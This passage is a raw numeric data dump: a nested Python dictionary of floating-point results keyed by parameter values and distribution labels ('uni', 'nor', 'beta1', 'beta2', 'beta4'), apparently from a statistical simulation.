0.048131670902745394}, 300: {'uni': 0.0736981524234896, 'nor': 0.16102927114194954, 'beta1': 0.0699378076866422, 'beta2': 0.1359450077822285, 'beta4': 0.055744371538938964}, 200: {'uni': 0.08801073759496875, 
'nor': 0.16994023103299272, 'beta1': 0.08505228657724262, 'beta2': 0.1463769299335057, 'beta4': 0.06912750948895652}, 150: {'uni': 0.10119998770539862, 'nor': 0.17809227114576442, 'beta1': 0.09846662120153019, 'beta2': 0.1563069707446343, 'beta4': 0.0804849907703572}, 100: {'uni': 0.12165160638390676, 'nor': 0.1925681843339241, 'beta1': 0.12041960699493481, 'beta2': 0.17156822159027985, 'beta4': 0.10014130433781748}, 75: {'uni': 0.13975451811748224, 'nor': 0.2056309659993777, 'beta1': 0.13866205873705784, 'beta2': 0.1837990537785728, 'beta4': 0.11619303536405938}, 50: {'uni': 0.1707628459531228, 'nor': 0.22834518013555266, 'beta1': 0.16826103008208187, 'beta2': 0.20898788453415473, 'beta4': 0.1459501849665349}, 30: {'uni': 0.21737854401306778, 'nor': 0.2651944679135494, 'beta1': 0.2169374533538973, 'beta2': 0.24814946824995282, 'beta4': 0.19477597502585953}, 20: {'uni': 0.26172292368747657, 'nor': 0.30251728219002344, 'beta1': 0.2644484410276723, 'beta2': 0.29110454324712, 'beta4': 0.24126464705741385}, 10: {'uni': 0.3667581652322965, 'nor': 0.40279126451218983, 'beta1': 0.3692768516896085, 'beta2': 0.3866633789743732, 'beta4': 0.34861300659940814}}, 20: {1000: {'uni': 0.05370924654054801, 'nor': 0.17648599487397, 'beta1': 0.04804540228549625, 'beta2': 0.1343446649365414, 'beta4': 0.02997352312939844}, 750: {'uni': 0.05729122370623074, 'nor': 0.1803587541418622, 'beta1': 0.04812500176891543, 'beta2': 0.13786905650664827, 'beta4': 0.03477191515013617}, 500: {'uni': 0.06464930552073, 'nor': 0.18336329212636393, 'beta1': 0.05469422873209995, 'beta2': 0.14239511606905197, 'beta4': 0.04271981408076597}, 400: {'uni': 0.06986628923619037, 'nor': 0.18625313891095058, 'beta1': 0.06071158332876331, 'beta2': 0.14471049421579463, 'beta4': 0.047627222949097936}, 300: {'uni': 0.0777256622725595, 'nor': 0.18953337250453745, 'beta1': 0.070054764465032, 'beta2': 0.1512744075762968, 'beta4': 0.0552010190871432}, 200: {'uni': 0.09158087111218582, 'nor': 0.19800738103301052, 'beta1': 
0.0864137923024384, 'beta2': 0.15931545015663917, 'beta4': 0.06814299912620103}, 150: {'uni': 0.10335435452469321, 'nor': 0.2054309649794448, 'beta1': 0.09892077062896198, 'beta2': 0.16793211210769832, 'beta4': 0.07953126024663426}, 100: {'uni': 0.12424516715196299, 'nor': 0.21856150700189325, 'beta1': 0.12057266069376027, 'beta2': 0.18383332726712043, 'beta4': 0.09738694233698236}, 75: {'uni': 0.1417104597444815, 'nor': 0.23034885885084855, 'beta1': 0.13841928094108402, 'beta2': 0.1968525929870979, 'beta4': 0.1150925954043509}, 50: {'uni': 0.17111110661077933, 'nor': 0.2524518773718313, 'beta1': 0.17046731006299556, 'beta2': 0.21788191331659196, 'beta4': 0.14222869732898685}, 30: {'uni': 0.21687551224414225, 'nor': 0.28926214134356854, 'beta1': 0.21629470859709887, 'beta2': 0.25673815181901094, 'beta4': 0.1892955689821264}, 20: {'uni': 0.26430445397421665, 'nor': 0.3247388087097957, 'beta1': 0.2638148393051306, 'beta2': 0.29743250866558657, 'beta4': 0.23622944016863467}, 10: {'uni': 0.36737909439043254, 'nor': 0.4125208499637192, 'beta1': 0.3660874383968239, 'beta2': 0.38838554766199895, 'beta4': 0.3439063586015456}}, 10: {1000: {'uni': 0.08862146976790009, 'nor': 0.2535995199262815, 'beta1': 0.09069671581521854, 'beta2': 0.16803506355157516, 'beta4': 0.029921859317868282}, 750: {'uni': 0.08977033393809541, 'nor': 0.254580496609131, 'beta1': 0.09071297119014299, 'beta2': 0.1691038026265949, 'beta4': 0.034510090116727565}, 500: {'uni': 0.09238549230306914, 'nor': 0.25987057271300046, 'beta1': 0.09073934473664924, 'beta2': 0.17440911430930217, 'beta4': 0.04213161613017047}, 400: {'uni': 0.09459196287285188, 'nor': 0.26027933684777826, 'beta1': 0.09074209915698388, 'beta2': 0.17593382577625938, 'beta4': 0.04768105187754579}, 300: {'uni': 0.09917712584623528, 'nor': 0.2615501480076419, 'beta1': 0.09091594609476689, 'beta2': 0.1805409357764428, 'beta4': 0.05498060190263093}, 200: {'uni': 0.10872992256114376, 'nor': 0.2695197969164528, 'beta1': 0.09138518619528078, 
'beta2': 0.18687142652551247, 'beta4': 0.06740841503327016}, 150: {'uni': 0.11782830618505136, 'nor': 0.2762185043437084, 'beta1': 0.10051161390790297, 'beta2': 0.1942070856751601, 'beta4': 0.07819221056213072}, 100: {'uni': 0.13438399664084844, 'nor': 0.28816303619228323, 'beta1': 0.12084090735087949, 'beta2': 0.20547572552005522, 'beta4': 0.09570415694090936}, 75: {'uni': 0.15023870303077683, 'nor': 0.2958611782293753, 'beta1': 0.1395907599244337, 'beta2': 0.21686046108693185, 'beta4': 0.11050164335769763}, 50: {'uni': 0.1782266716766201, 'nor': 0.3141960877725066, 'beta1': 0.16859036565221908, 'beta2': 0.24007665604305778, 'beta4': 0.13764276895735614}, 30: {'uni': 0.22096576164827378, 'nor': 0.3459767153505968, 'beta1': 0.21633032217123638, 'beta2': 0.27349437174891433, 'beta4': 0.18066617575900545}, 20: {'uni': 0.26383403962743235, 'nor': 0.37594074244986514, 'beta1': 0.26301385683685513, 'beta2': 0.3103976354263712, 'beta4': 0.22515639301084087}, 10: {'uni': 0.3664196082159237, 'nor': 0.45714739810989896, 'beta1': 0.3636555139455243, 'beta2': 0.3974337064021698, 'beta4': 0.3276445784663552}}}, 0.2: {1000: {1000: {'uni': 0.03388738157245541, 'nor': 0.04015666897414438, 'beta1': 0.03355667375414395, 'beta2': 0.055574500180284314, 'beta4': 0.03068120985677973}, 750: {'uni': 0.03899522828726909, 'nor': 0.04482662034784124, 'beta1': 0.038906952257139416, 'beta2': 0.0577336142241367, 'beta4': 0.035726625386190314}, 500: {'uni': 0.047776296371012106, 'nor': 0.0524414607908541, 'beta1': 0.04779122142786796, 'beta2': 0.06290813245562621, 'beta4': 0.04449308639070271}, 400: {'uni': 0.05336721519256357, 'nor': 0.05743278486341408, 'beta1': 0.053125312827925875, 'beta2': 0.06632258983296924, 'beta4': 0.05071787362274782}, 300: {'uni': 0.0613357895908182, 'nor': 0.06550100428584399, 'beta1': 0.06109741329317647, 'beta2': 0.07293163000037511, 'beta4': 0.05908868335670159}, 200: {'uni': 0.07501845542232805, 'nor': 0.07876069039917577, 'beta1': 0.07500276171787268, 'beta2': 
0.08419855412256849, 'beta4': 0.07278561303210473}, 150: {'uni': 0.08634506901837877, 'nor': 0.08904521157666112, 'beta1': 0.08632477062450605, 'beta2': 0.09453176706786948, 'beta4': 0.08472926033937267}, 100: {'uni': 0.1057124222050787, 'nor': 0.10808546837916216, 'beta1': 0.10516591278839627, 'beta2': 0.11170808920861064, 'beta4': 0.10393226778652609}, 75: {'uni': 0.12149208320718635, 'nor': 0.12306907509286319, 'beta1': 0.12209431187926248, 'beta2': 0.12646902554095174, 'beta4': 0.12019336772939093}, 50: {'uni': 0.14783464657037992, 'nor': 0.14989562158896733, 'beta1': 0.14870430658867798, 'beta2': 0.15298471478505016, 'beta4': 0.14675275578661956}, 30: {'uni': 0.19121204259605487, 'nor': 0.19161889709583674, 'beta1': 0.18958426307805673, 'beta2': 0.19343552624644, 'beta4': 0.18882942312354808}, 20: {'uni': 0.23271862737098403, 'nor': 0.23131945605660487, 'beta1': 0.23084583243478113, 'beta2': 0.2339139193810307, 'beta4': 0.23046342255270594}, 10: {'uni': 0.3225715177370052, 'nor': 0.32210711594806274, 'beta1': 0.32134895787627404, 'beta2': 0.32533513676914994, 'beta4': 0.32219881278226875}}, 750: {1000: {'uni': 0.03376714362696076, 'nor': 0.042024347317684174, 'beta1': 0.03369092286126596, 'beta2': 0.055889726610143464, 'beta4': 0.03024928592128745}, 750: {'uni': 0.03891496409139339, 'nor': 0.046131807231977684, 'beta1': 0.038847267411021014, 'beta2': 0.05801346441223432, 'beta4': 0.035253753207794225}, 500: {'uni': 0.04749484005992066, 'nor': 0.05359269975534858, 'beta1': 0.04758858015566003, 'beta2': 0.06257170586617439, 'beta4': 0.044068141367767266}, 400: {'uni': 0.05297468125525839, 'nor': 0.05926387355580798, 'beta1': 0.05295355833022475, 'beta2': 0.0666115313485337, 'beta4': 0.04992787350991934}, 300: {'uni': 0.06112594909603697, 'nor': 0.06629753648545333, 'beta1': 0.06138650353983818, 'beta2': 0.07343192849203295, 'beta4': 0.05810524207749168}, 200: {'uni': 0.07490063551528908, 'nor': 0.07942685260233576, 'beta1': 0.07438999529385071, 'beta2': 
0.08515842923668693, 'beta4': 0.07205056427377587}, 150: {'uni': 0.08639622501196301, 'nor': 0.08962430009180156, 'beta1': 0.08575239384506436, 'beta2': 0.09486183374614099, 'beta4': 0.0835611646348291}, 100: {'uni': 0.10581425933251165, 'nor': 0.10810039846104558, 'beta1': 0.10589792403845494, 'beta2': 0.11188037819837482, 'beta4': 0.10306934411821278}, 75: {'uni': 0.1214540209799046, 'nor': 0.12485134735341119, 'beta1': 0.12141611216283932, 'beta2': 0.12662789787139295, 'beta4': 0.11982036085184888}, 50: {'uni': 0.14841865927342057, 'nor': 0.15115605407635108, 'beta1': 0.14882335320078816, 'beta2': 0.15301035196557927, 'beta4': 0.14740389167526288}, 30: {'uni': 0.19055206451646386, 'nor': 0.19229401661443357, 'beta1': 0.19006065116918158, 'beta2': 0.19466607401258693, 'beta4': 0.18866007451684785}, 20: {'uni': 0.23100251462520283, 'nor': 0.23351937614410023, 'beta1': 0.23055792133077502, 'beta2': 0.23429666500235652, 'beta4': 0.23068072631463016}, 10: {'uni': 0.321735912802274, 'nor': 0.32423692759003264, 'beta1': 0.3239617966140733, 'beta2': 0.32437308055517045, 'beta4': 0.3249136529859552}}, 500: {1000: {'uni': 0.03361099658500921, 'nor': 0.045330398129452165, 'beta1': 0.03371228816752819, 'beta2': 0.05832511086354275, 'beta4': 0.029273019646634646}, 750: {'uni': 0.038816575943483644, 'nor': 0.0491504214333881, 'beta1': 0.039015892770372096, 'beta2': 0.060770948426164983, 'beta4': 0.034501276617158405}, 500: {'uni': 0.04815961880455866, 'nor': 0.05646388049918538, 'beta1': 0.047616095765788624, 'beta2': 0.06578607920387605, 'beta4': 0.043089689535904585}, 400: {'uni': 0.053452201672102295, 'nor': 0.06153375349484047, 'beta1': 0.052983040292405525, 'beta2': 0.07031702338528978, 'beta4': 0.048637574479821644}, 300: {'uni': 0.06127370649997177, 'nor': 0.06874638836387548, 'beta1': 0.06133068039745698, 'beta2': 0.07561704434900895, 'beta4': 0.057273437560509066}, 200: {'uni': 0.07472226953381489, 'nor': 0.08105755495025313, 'beta1': 0.07504375951495804, 'beta2': 
0.0877176493907923, 'beta4': 0.07144906208708657}, 150: {'uni': 0.08655826756432694, 'nor': 0.09209107605088962, 'beta1': 0.08700099545101375, 'beta2': 0.09953347989595823, 'beta4': 0.08270140680266824}, 100: {'uni': 0.10589569548753086, 'nor': 0.11067808441589783, 'beta1': 0.10570360745340612, 'beta2': 0.11521549542004672, 'beta4': 0.10204817369562785}, 75: {'uni': 0.1214238464236953, 'nor': 0.1257918905040879, 'beta1': 0.12201308622504331, 'beta2': 0.12918412209535224, 'beta4': 0.1184359299309477}, 50: {'uni': 0.14801176067778704, 'nor': 0.15169848925285823, 'beta1': 0.1490310518112693, 'beta2': 0.15460147219717485, 'beta4': 0.14566535210883857}, 30: {'uni': 0.19132874999388066, 'nor': 0.19329023907863613, 'beta1': 0.1907485547222172, 'beta2': 0.1941783283376482, 'beta4': 0.18736708420254317}, 20: {'uni': 0.23282248165413844, 'nor': 0.232655718238027, 'beta1': 0.23254110249310414, 'beta2': 0.23479815552622696, 'beta4': 0.22895872572703413}, 10: {'uni': 0.3238030709255784, 'nor': 0.32527484356803527, 'beta1': 0.32251033930915673, 'beta2': 0.325462541104486, 'beta4': 0.3216777112141702}}, 400: {1000: {'uni': 0.03386042788512955, 'nor': 0.047710828017344276, 'beta1': 0.0337310904928686, 'beta2': 0.05890009367362975, 'beta4': 0.029040534438643628}, 750: {'uni': 0.03904468308757758, 'nor': 0.051551219035761986, 'beta1': 0.03885610324170258, 'beta2': 0.0606985856416401, 'beta4': 0.0340554853290308}, 500: {'uni': 0.047602093704168735, 'nor': 0.05814584365187403, 'beta1': 0.04748869924936838, 'beta2': 0.06611742375228202, 'beta4': 0.04271018009250971}, 400: {'uni': 0.05304223077370851, 'nor': 0.06292081768546079, 'beta1': 0.05279164279598325, 'beta2': 0.07002077573100743, 'beta4': 0.04866770038722679}, 300: {'uni': 0.06141397119642633, 'nor': 0.07030627117167121, 'beta1': 0.06097126432087274, 'beta2': 0.07635636078134611, 'beta4': 0.056339224324690684}, 200: {'uni': 0.07503889889243953, 'nor': 0.08238702118585328, 'beta1': 0.07494642001255589, 'beta2': 
0.08906360121274909, 'beta4': 0.07041606833950242}, 150: {'uni': 0.08650534294392143, 'nor': 0.09368577651895194, 'beta1': 0.08609035232292472, 'beta2': 0.09880346197322298, 'beta4': 0.08192514174926191}, 100: {'uni': 0.10554211559941079, 'nor': 0.11085547265078599, 'beta1': 0.10592424086268526, 'beta2': 0.11560686173795065, 'beta4': 0.10181407800596476}, 75: {'uni': 0.12118585486438052, 'nor': 0.12734779642511718, 'beta1': 0.12111707280276551, 'beta2': 0.1305965998046278, 'beta4': 0.11787930087738932}, 50: {'uni': 0.14797599649230353, 'nor': 0.15171514649116935, 'beta1': 0.1484099702342504, 'beta2': 0.15541609636822673, 'beta4': 0.14510227576798918}, 30: {'uni': 0.19021549568018936, 'nor': 0.1933618553897194, 'beta1': 0.1907191702304276, 'beta2': 0.19541117767136984, 'beta4': 0.18755377058130973}, 20: {'uni': 0.23146197858779916, 'nor': 0.23407289720723795, 'beta1': 0.23230655807246425, 'beta2': 0.23567907159586732, 'beta4': 0.2291439538234219}, 10: {'uni': 0.3221026192917168, 'nor': 0.3245602129335199, 'beta1': 0.32277705217495795, 'beta2': 0.3261921289212465, 'beta4': 0.32191737143798144}}, 300: {1000: {'uni': 0.033695118131507495, 'nor': 0.05091916329512536, 'beta1': 0.03393619351717603, 'beta2': 0.06057179016027847, 'beta4': 0.0285990426293512}, 750: {'uni': 0.03910414563500947, 'nor': 0.05465137245133267, 'beta1': 0.038816776120210894, 'beta2': 0.06313897920954847, 'beta4': 0.033354645226166046}, 500: {'uni': 0.04762543649309181, 'nor': 0.06159887019353166, 'beta1': 0.04780391171257714, 'beta2': 0.0681292524818165, 'beta4': 0.04184091667546608}, 400: {'uni': 0.05345378246611335, 'nor': 0.06617151036624425, 'beta1': 0.05302241280194575, 'beta2': 0.07278816401083432, 'beta4': 0.04729132105092715}, 300: {'uni': 0.06133399743947998, 'nor': 0.0731521981557415, 'beta1': 0.061595854882960877, 'beta2': 0.08129842890779082, 'beta4': 0.055524597397617226}, 200: {'uni': 0.07473088765308139, 'nor': 0.0848296423748201, 'beta1': 0.07519297407714975, 'beta2': 
0.09105884496116406, 'beta4': 0.06951013639767534}, 150: {'uni': 0.08667661820391337, 'nor': 0.09523718870586606, 'beta1': 0.08692359414490303, 'beta2': 0.10060898747715086, 'beta4': 0.08103195453051082}, 100: {'uni': 0.10553388362967905, 'nor': 0.11381051637354644, 'beta1': 0.10561397962134611, 'beta2': 0.11792834991131423, 'beta4': 0.10090718775359064}, 75: {'uni': 0.12155221095133384, 'nor': 0.12793878242727197, 'beta1': 0.1215592598705928, 'beta2': 0.1322756449085521, 'beta4': 0.1168330578874448}, 50: {'uni': 0.14804683077762326, 'nor': 0.15419659403457153, 'beta1': 0.14866575944705585, 'beta2': 0.15751859961478853, 'beta4': 0.14405280732471298}, 30: {'uni': 0.19026263588328451, 'nor': 0.19412845565379028, 'beta1': 0.19049550527182446, 'beta2': 0.196939457774988, 'beta4': 0.1866360117186579}, 20: {'uni': 0.2313876995850297, 'nor': 0.23502769104830612, 'beta1': 0.23105225723665046, 'beta2': 0.23608963938520033, 'beta4': 0.2292267482273611}, 10: {'uni': 0.3221120205638056, 'nor': 0.3243045336872488, 'beta1': 0.3208731593800577, 'beta2': 0.3252380584126876, 'beta4': 0.31984201603154766}}, 200: {1000: {'uni': 0.03389126620048066, 'nor': 0.05765077575778865, 'beta1': 0.03376008405740816, 'beta2': 0.06437824504169704, 'beta4': 0.0279614561315292}, 750: {'uni': 0.03903612475565288, 'nor': 0.06067305171910875, 'beta1': 0.039025478836297256, 'beta2': 0.06680002944624919, 'beta4': 0.03292291515427731}, 500: {'uni': 0.04775932391254628, 'nor': 0.06680855125140311, 'beta1': 0.04777372167795524, 'beta2': 0.0730432372041967, 'beta4': 0.04099670926553012}, 400: {'uni': 0.053169992426212453, 'nor': 0.07130050098050561, 'beta1': 0.053126182451097015, 'beta2': 0.07958454016209743, 'beta4': 0.046411644412640785}, 300: {'uni': 0.06084117394290545, 'nor': 0.07778044249500193, 'beta1': 0.06160223598764697, 'beta2': 0.08429495593767933, 'beta4': 0.05440016577981527}, 200: {'uni': 0.07486690598932355, 'nor': 0.09015651052130147, 'beta1': 0.0750283211417685, 'beta2': 
0.09516934496985152, 'beta4': 0.06768527669021038}, 150: {'uni': 0.08629721643574545, 'nor': 0.0993067628049017, 'beta1': 0.08668817140327162, 'beta2': 0.10516268131208634, 'beta4': 0.07953728925132197}, 100: {'uni': 0.10546884892973363, 'nor': 0.1168548961678525, 'beta1': 0.10626217079796596, 'beta2': 0.1204989099383002, 'beta4': 0.09903875776592275}, 75: {'uni': 0.12168012164046638, 'nor': 0.1314303884963226, 'beta1': 0.12214826537759482, 'beta2': 0.1351994296696919, 'beta4': 0.1149866262333511}, 50: {'uni': 0.14782352233644408, 'nor': 0.15754764223117135, 'beta1': 0.14825063238007496, 'beta2': 0.15841952571485496, 'beta4': 0.14294406590744546}, 30: {'uni': 0.19048227877938156, 'nor': 0.1967417135295928, 'beta1': 0.18997647207879326, 'beta2': 0.1985375655182654, 'beta4': 0.1860365582166873}, 20: {'uni': 0.23118653990494603, 'nor': 0.2362845426246003, 'beta1': 0.23216547900931916, 'beta2': 0.23821825980001504, 'beta4': 0.22782447476862544}, 10: {'uni': 0.3211281593663615, 'nor': 0.32606182576485077, 'beta1': 0.3236233700149418, 'beta2': 0.32878598247569857, 'beta4': 0.3207221077913689}}, 150: {1000: {'uni': 0.03396456507138623, 'nor': 0.0630608330646778, 'beta1': 0.0337277801465099, 'beta2': 0.06770210959513101, 'beta4': 0.02782320511153541}, 750: {'uni': 0.03910044490462494, 'nor': 0.06648103251076115, 'beta1': 0.03880293828339021, 'beta2': 0.07044578061655482, 'beta4': 0.032404976904047755}, 500: {'uni': 0.047957863191993855, 'nor': 0.07218240504190596, 'beta1': 0.04756246411890541, 'beta2': 0.07886065014379595, 'beta4': 0.04025719542113432}, 400: {'uni': 0.05359261424909634, 'nor': 0.07672357193415957, 'beta1': 0.053195230735709365, 'beta2': 0.08232822341436707, 'beta4': 0.045660798052570645}, 300: {'uni': 0.06095634560530494, 'nor': 0.08246385189061045, 'beta1': 0.06158333945371208, 'beta2': 0.08770721726682829, 'beta4': 0.053329443870827636}, 200: {'uni': 0.07542313957478985, 'nor': 0.09376844697035747, 'beta1': 0.07502483861611764, 'beta2': 
0.09930331490997918, 'beta4': 0.06676883228264996}, 150: {'uni': 0.08612997994268534, 'nor': 0.10304658085927404, 'beta1': 0.08676278127457426, 'beta2': 0.10801928051315668, 'beta4': 0.07857687034701241}, 100: {'uni': 0.10487250667170855, 'nor': 0.11932842046669623, 'beta1': 0.10614742264977517, 'beta2': 0.1240130501571779, 'beta4': 0.09727175686115075}, 75: {'uni': 0.12125587425148476, 'nor': 0.13477382757210765, 'beta1': 0.12123394920739405, 'beta2': 0.13735136783257884, 'beta4': 0.11414306692306875}, 50: {'uni': 0.14807161438081134, 'nor': 0.15892016658734387, 'beta1': 0.148560766937952, 'beta2': 0.16159831870181401, 'beta4': 0.1417900094042981}, 30: {'uni': 0.18999549214586064, 'nor': 0.19904964098027866, 'beta1': 0.19071102883002822, 'beta2': 0.20019795935043838, 'beta4': 0.18394814557977696}, 20: {'uni': 0.2315147837574712, 'nor': 0.23783415188052248, 'beta1': 0.2324397659800763, 'beta2': 0.23998185635535838, 'beta4': 0.22593857547727642}, 10: {'uni': 0.3219852137932768, 'nor': 0.32723676254678064, 'beta1': 0.32356225696956475, 'beta2': 0.3269691590497776, 'beta4': 0.3198335598449822}}, 100: {1000: {'uni': 0.03411194849559385, 'nor': 0.07287242105906888, 'beta1': 0.03382125829922744, 'beta2': 0.07002374839528969, 'beta4': 0.027407494662168852}, 750: {'uni': 0.03938154082727641, 'nor': 0.07580278019762332, 'beta1': 0.039103170488301364, 'beta2': 0.07321818422715465, 'beta4': 0.03188744748160627}, 500: {'uni': 0.04778928237643254, 'nor': 0.08110701684552524, 'beta1': 0.047810374146142864, 'beta2': 0.08203011864750759, 'beta4': 0.03952324078463222}, 400: {'uni': 0.0534810053390774, 'nor': 0.08508194249549039, 'beta1': 0.05352127702635723, 'beta2': 0.08537754830278577, 'beta4': 0.04481417769901397}, 300: {'uni': 0.06166341110979501, 'nor': 0.09150201948101794, 'beta1': 0.06113077709028425, 'beta2': 0.09038186391687197, 'beta4': 0.05211846493236742}, 200: {'uni': 0.07520911700485444, 'nor': 0.10091005418742754, 'beta1': 0.07506822671283137, 'beta2': 
0.10171318740985519, 'beta4': 0.06518371829303138}, 150: {'uni': 0.08676252704286641, 'nor': 0.109975580477785, 'beta1': 0.08644340439225118, 'beta2': 0.11178799632878333, 'beta4': 0.07633395622902756}, 100: {'uni': 0.10629645295984264, 'nor': 0.1258041278664646, 'beta1': 0.10529533439068595, 'beta2': 0.12702981218946555, 'beta4': 0.09569346182437452}, 75: {'uni': 0.12112331247638874, 'nor': 0.14051961004379154, 'beta1': 0.12250367446398408, 'beta2': 0.1419312079891245, 'beta4': 0.11164814343344687}, 50: {'uni': 0.14850915109683305, 'nor': 0.164857883156725, 'beta1': 0.14797844957977346, 'beta2': 0.16537134374996698, 'beta4': 0.13887660533943375}, 30: {'uni': 0.19061314919489092, 'nor': 0.20238067255048653, 'beta1': 0.1898804661221951, 'beta2': 0.2034759671609193, 'beta4': 0.18169040960889707}, 20: {'uni': 0.23206346175230053, 'nor': 0.24178386379175654, 'beta1': 0.2312278955520718, 'beta2': 0.24112122817067416, 'beta4': 0.22539667105811617}, 10: {'uni': 0.3196702240237979, 'nor': 0.33251158834688327, 'beta1': 0.32295889633274955, 'beta2': 0.328393531993296, 'beta4': 0.31666570512538683}}, 75: {1000: {'uni': 0.03485783601744907, 'nor': 0.08051567869925941, 'beta1': 0.033648744067629854, 'beta2': 0.07403441562434876, 'beta4': 0.02718882272100026}, 750: {'uni': 0.039971273861006185, 'nor': 0.08378469794057, 'beta1': 0.03914992626191016, 'beta2': 0.07629409467461495, 'beta4': 0.03167459557515717}, 500: {'uni': 0.04814188204423331, 'nor': 0.08871034088415142, 'beta1': 0.04758674792285417, 'beta2': 0.08541839890028591, 'beta4': 0.03925920431586538}, 400: {'uni': 0.054007658904476896, 'nor': 0.09269490981804712, 'beta1': 0.05325465974697008, 'beta2': 0.08787830915620459, 'beta4': 0.04425711117117276}, 300: {'uni': 0.06166042307350328, 'nor': 0.09814136406424179, 'beta1': 0.06140103113984097, 'beta2': 0.0953246518668952, 'beta4': 0.05161170153868877}, 200: {'uni': 0.07533722846773899, 'nor': 0.1076845305009698, 'beta1': 0.07475323397653444, 'beta2': 0.10614951521713306, 
'beta4': 0.06424476858167916}, 150: {'uni': 0.08661147103718747, 'nor': 0.11679904366669902, 'beta1': 0.0862468564230863, 'beta2': 0.11532702446321819, 'beta4': 0.07558718090110728}, 100: {'uni': 0.1052555935603583, 'nor': 0.13183406809273956, 'beta1': 0.10578415846309697, 'beta2': 0.13050924243730755, 'beta4': 0.0937872652849821}, 75: {'uni': 0.12126435398082328, 'nor': 0.14504840369414934, 'beta1': 0.12158416691242752, 'beta2': 0.14424291715318288, 'beta4': 0.11036706757812237}, 50: {'uni': 0.14834069782758857, 'nor': 0.16807773831916928, 'beta1': 0.1488517171705721, 'beta2': 0.16739872482395307, 'beta4': 0.13691632557397643}, 30: {'uni': 0.19058841526927756, 'nor': 0.2065490922203851, 'beta1': 0.1901874541797639, 'beta2': 0.20483694072987557, 'beta4': 0.1806171436449474}, 20: {'uni': 0.23088484153300304, 'nor': 0.24560591918060148, 'beta1': 0.23134779605096323, 'beta2': 0.24365102169836095, 'beta4': 0.22264414971371438}, 10: {'uni': 0.3223581507118726, 'nor': 0.3333247832694408, 'beta1': 0.3216527474966696, 'beta2': 0.33129856873943275, 'beta4': 0.31612481972111983}}, 50: {1000: {'uni': 0.03610852487574101, 'nor': 0.0960874267256373, 'beta1': 0.033752114731624816, 'beta2': 0.0812415823085737, 'beta4': 0.0271620542706206}, 750: {'uni': 0.04093834200462532, 'nor': 0.09793556503751522, 'beta1': 0.03893376090817102, 'beta2': 0.08431844210129946, 'beta4': 0.03135962540422432}, 500: {'uni': 0.049336171986172905, 'nor': 0.10301434196794912, 'beta1': 0.04759746865566261, 'beta2': 0.09139711532965078, 'beta4': 0.03862301968563475}, 400: {'uni': 0.05463463924511991, 'nor': 0.10682402764821919, 'beta1': 0.05340709570203017, 'beta2': 0.0936397826733697, 'beta4': 0.04355260412773232}, 300: {'uni': 0.0623466502897439, 'nor': 0.11107955757096866, 'beta1': 0.06138170680347399, 'beta2': 0.10123250462805955, 'beta4': 0.05033595962483417}, 200: {'uni': 0.07554749668228766, 'nor': 0.12086678162054343, 'beta1': 0.0750416632363875, 'beta2': 0.11066959713661007, 'beta4': 
0.0628060062760799}, 150: {'uni': 0.08739996958985385, 'nor': 0.12869541233213377, 'beta1': 0.08678659184299659, 'beta2': 0.12101764597314102, 'beta4': 0.07333451117705557}, 100: {'uni': 0.1059059556833244, 'nor': 0.1439095892813752, 'beta1': 0.10502496284200347, 'beta2': 0.1363796007125728, 'beta4': 0.09183606784698817}, 75: {'uni': 0.12175423531083684, 'nor': 0.15563413203809512, 'beta1': 0.12147657892364672, 'beta2': 0.1499620639515612, 'beta4': 0.10751782011418409}, 50: {'uni': 0.14800126374665257, 'nor': 0.17897180334401325, 'beta1': 0.14816290217139777, 'beta2': 0.1722281185648024, 'beta4': 0.1346224305003566}, 30: {'uni': 0.1887615721783148, 'nor': 0.21543468889014744, 'beta1': 0.190646670636544, 'beta2': 0.20948680711825576, 'beta4': 0.176259226549204}, 20: {'uni': 0.23023189652909293, 'nor': 0.2526685251360331, 'beta1': 0.23189889525873808, 'beta2': 0.2466910520448944, 'beta4': 0.2191893725919991}, 10: {'uni': 0.32299804783142616, 'nor': 0.3385208191642214, 'beta1': 0.3240970373299222, 'beta2': 0.330246772124018, 'beta4': 0.3131856367832769}}, 30: {1000: {'uni': 0.04055798585870418, 'nor': 0.12045878407806199, 'beta1': 0.03391282668139051, 'beta2': 0.09043202391168703, 'beta4': 0.026772664648918143}, 750: {'uni': 0.04458498964957813, 'nor': 0.12145350900121721, 'beta1': 0.03914910293909302, 'beta2': 0.0935565637316701, 'beta4': 0.031080040721369384}, 500: {'uni': 0.05222341973082678, 'nor': 0.1268382821804781, 'beta1': 0.04777032892633393, 'beta2': 0.09990217329576723, 'beta4': 0.03819481473884745}, 400: {'uni': 0.056861508270290684, 'nor': 0.12942238770629788, 'beta1': 0.0532675354399576, 'beta2': 0.10316552318518735, 'beta4': 0.042868749065423484}, 300: {'uni': 0.06457084720883632, 'nor': 0.13351603952339597, 'beta1': 0.061361887130497395, 'beta2': 0.10951015522976426, 'beta4': 0.049682092131381306}, 200: {'uni': 0.07720678728039648, 'nor': 0.14219389731717424, 'beta1': 0.07503079131267198, 'beta2': 0.12017019496462067, 'beta4': 0.061734503814410535}, 
150: {'uni': 0.08848642196594714, 'nor': 0.1500355311895341, 'beta1': 0.08631984938429821, 'beta2': 0.12838525098850095, 'beta4': 0.0718410012841619}, 100: {'uni': 0.10657957938014417, 'nor': 0.16231407544099366, 'beta1': 0.10548271930091585, 'beta2': 0.14360421901255419, 'beta4': 0.08890819357084263}, 75: {'uni': 0.12258252780364842, 'nor': 0.1746077488797695, 'beta1': 0.12168422916715942, 'beta2': 0.15632646573417341, 'beta4': 0.10426763026201397}, 50: {'uni': 0.14824751171813622, 'nor': 0.19345539799865896, 'beta1': 0.14757982972276956, 'beta2': 0.1782320565559261, 'beta4': 0.12956990555575637}, 30: {'uni': 0.19007534797164194, 'nor': 0.22980066650049646, 'beta1': 0.18953145977057473, 'beta2': 0.21398344377916256, 'beta4': 0.17247209313506517}, 20: {'uni': 0.23051753895022453, 'nor': 0.2663268342701276, 'beta1': 0.2307327055958382, 'beta2': 0.2513386326841577, 'beta4': 0.21383795792710225}, 10: {'uni': 0.32014689511568667, 'nor': 0.34697266220274, 'beta1': 0.3237670049413221, 'beta2': 0.3357362830315301, 'beta4': 0.30748660519832094}}, 20: {1000: {'uni': 0.049274913203381954, 'nor': 0.14598076136064764, 'beta1': 0.04773172248544687, 'beta2': 0.10208044800903471, 'beta4': 0.02678894215396943}, 750: {'uni': 0.051859490365182094, 'nor': 0.14739225959074442, 'beta1': 0.047875305623994, 'beta2': 0.10544771824923445, 'beta4': 0.031169107205504698}, 500: {'uni': 0.058024976856876465, 'nor': 0.15193051514519595, 'beta1': 0.04839368483595815, 'beta2': 0.10979535020355546, 'beta4': 0.038016224370682805}, 400: {'uni': 0.062200844002211486, 'nor': 0.1537517807864368, 'beta1': 0.05344573741806791, 'beta2': 0.11432086453404405, 'beta4': 